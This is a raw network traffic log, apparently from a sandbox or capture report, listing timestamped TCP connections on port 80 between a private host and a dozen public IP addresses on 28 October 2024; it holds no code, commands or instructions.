                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.001490116 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.001935959 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.143939018 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.193809986 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.414597988 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.414647102 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.420641899 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.420984983 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.560302973 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.615686893 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.850526094 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.854074001 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.263294935 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.268903971 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271256924 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271425962 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271425962 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.276854992 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.277031898 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.090595961 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.090764999 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.096494913 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.096559048 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.372339964 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378273010 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378372908 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378541946 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378563881 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.384584904 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.384603024 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.209378004 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.209666014 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.215711117 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.215771914 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481709003 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481921911 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481982946 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.491166115 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.493185997 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.914385080 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.914573908 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.920790911 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.920871973 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.130873919 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136302948 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136389971 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136723042 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136785030 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.142052889 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.142461061 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021253109 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021730900 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021780014 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021785021 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021820068 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.022437096 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.022655964 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.023762941 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.023834944 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.037400007 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.042891979 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.108433962 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.113991976 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114672899 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114883900 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114939928 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.120311975 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.120884895 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.666467905 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.666650057 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.673067093 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.673557043 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.703788996 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.709381104 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711036921 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711174965 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711263895 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.716506004 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.716991901 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.141578913 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.144809961 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.150841951 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.150904894 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.346263885 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354748964 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354898930 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354965925 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354965925 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.360719919 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.361440897 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.198287964 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.198988914 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.205466032 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.097281933 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.110600948 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.115962982 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.116554976 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147864103 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147901058 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.153496981 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.153553009 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.799316883 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.818835974 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825174093 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825232029 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.868124962 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.873658895 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.873740911 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874021053 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874051094 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.879329920 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.879957914 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.305397987 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.314376116 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.320086956 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.320138931 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.331171036 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.336971998 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337038994 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337615967 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337645054 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.343125105 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.343190908 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.333245993 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.338222027 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.374891043 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.374943018 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.386636019 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.392091990 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.392266989 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.399827003 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.399847031 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.405308962 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.405339003 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.499912977 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.499991894 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.500041008 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.505731106 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.816320896 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.818730116 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.824963093 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.825025082 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.872998953 CET5003280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.878789902 CET805003213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.878870964 CET5003280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.898600101 CET5003280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.898655891 CET5003280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.904093027 CET805003213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.904125929 CET805003213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.315936089 CET805003213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.316241026 CET5003280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.322603941 CET805003213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.085448027 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.085557938 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.085705042 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.085737944 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.091185093 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.092137098 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.517138004 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.517463923 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.523523092 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.523586988 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.533852100 CET5004180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.539568901 CET80500413.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.539668083 CET5004180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.539834976 CET5004180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.542960882 CET5004180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.545205116 CET80500413.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.548475981 CET80500413.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.217255116 CET80500413.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.239727020 CET5004180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.247380018 CET80500413.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.247440100 CET5004180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.257220030 CET5004280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.264353991 CET805004235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.264458895 CET5004280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.264581919 CET5004280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.264606953 CET5004280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.271914959 CET805004235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.273113966 CET805004235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.093986988 CET805004235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.094168901 CET5004280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.103279114 CET805004235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.103336096 CET5004280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.206000090 CET5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.211711884 CET805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.211926937 CET5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.212018013 CET5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.212018013 CET5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.217634916 CET805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.217663050 CET805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.629209042 CET805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.629684925 CET5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.636063099 CET805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.636253119 CET5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.645169020 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.645198107 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.650610924 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.650708914 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.791265011 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.794641972 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.794708014 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.800179958 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.802088022 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.940088987 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.953423023 CET5004480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.959011078 CET805004444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.959110975 CET5004480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.959253073 CET5004480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.959253073 CET5004480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.964895964 CET805004444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654253960 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654402971 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654433966 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.659960985 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.659976006 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.322695017 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.323013067 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.329243898 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.329308987 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.336673975 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342303038 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342381954 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342493057 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342518091 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.347971916 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.348042965 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040076017 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040245056 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.046431065 CET805005244.221.84.105192.168.2.5
